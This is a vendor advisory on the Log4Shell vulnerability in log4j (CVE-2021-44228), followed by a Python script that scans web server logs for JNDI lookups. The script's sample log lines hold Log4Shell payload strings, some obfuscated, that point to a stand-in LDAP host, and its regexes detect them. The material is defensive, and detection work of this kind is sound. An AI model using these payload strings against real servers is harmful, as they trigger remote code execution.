Log4j 0day mitigation update CVE-2021-44228

  • Wallarm has rolled out an update to detect and mitigate CVE-2021-44228.
  • No additional actions are required from customers.
  • Exploitation attempts are blocked automatically in blocking mode.
  • When working in monitoring mode, consider creating a virtual patch.

Log4Shell

A 0-day exploit was discovered in the Java core library log4j that results in Remote Code Execution (RCE) through a simple one-line exploit using a JNDI URL. Given how ubiquitous this library is, how easy the flaw is to exploit, and the consequence of exploitation (full server control), this vulnerability is quite severe.

The attack surface is very wide, since it is almost impossible to find a Java project without the log4j library enabled. The vulnerability also affects internal Java-based services and APIs that log data received from other APIs and applications.

Wallarm update

Wallarm automatically identifies Log4Shell exploitation attempts and logs them in the Wallarm Console. The corresponding changes were added within two hours after the first information about CVE-2021-44228 was published.

You can search for the relevant events by filtering by CVE.

Mitigation

When using Wallarm in blocking mode, these attacks are blocked automatically. No action is required.

When using monitoring mode, we suggest creating a virtual patch. Feel free to reach out to support@wallarm.com if you need assistance.
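
For teams that also want to review their own web server logs for the JNDI lookup string described above, here is a detection sketch. It is an added example, not Wallarm's detection logic; the Combined Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: client IP, request path, referer, user-agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Innermost nested lookup such as ${lower:j}; replaced by its trailing value.
NESTED_RE = re.compile(r"\$\{[^${}]*:-?([^${}:]*)\}")

def has_jndi_lookup(value: str, max_rounds: int = 5) -> bool:
    """True if value contains a ${jndi: lookup after bounded normalization."""
    for _ in range(max_rounds):
        if JNDI_RE.search(value):
            return True
        nxt = unquote(value)                   # undo one layer of percent-encoding
        if nxt == value:
            nxt = NESTED_RE.sub(r"\1", value)  # else collapse nested lookups
        if nxt == value:
            return False                       # nothing left to normalize
        value = nxt
    return bool(JNDI_RE.search(value))

def scan(lines):
    """Return (ip, field) pairs for every logged field carrying a JNDI lookup."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        for field in ("path", "referer", "user_agent"):
            if has_jndi_lookup(m.group(field)):
                hits.append((m.group("ip"), field))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid host names).
SAMPLE = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /api/v1/items HTTP/1.1" 200 512 "-" "${jndi:ldap://collector.invalid/a}"',
    '198.51.100.7 - - [10/Dec/2021:09:14:05 +0000] "GET /search?q=%2524%257Bjndi%253Aldap%253A%252F%252Fcollector.invalid%252Fa%257D HTTP/1.1" 200 87 "-" "curl/7.79.1"',
    '203.0.113.20 - - [10/Dec/2021:09:15:11 +0000] "GET /health HTTP/1.1" 200 2 "-" "${${lower:j}ndi:ldap://collector.invalid/a}"',
    '192.0.2.33 - - [10/Dec/2021:09:16:40 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 4096 "https://example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, field in scan(SAMPLE):
        print(f"{ip}\t{field}")
```

A hit only shows that the string reached the server; whether it was ever passed to a vulnerable log4j call has to be checked separately.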
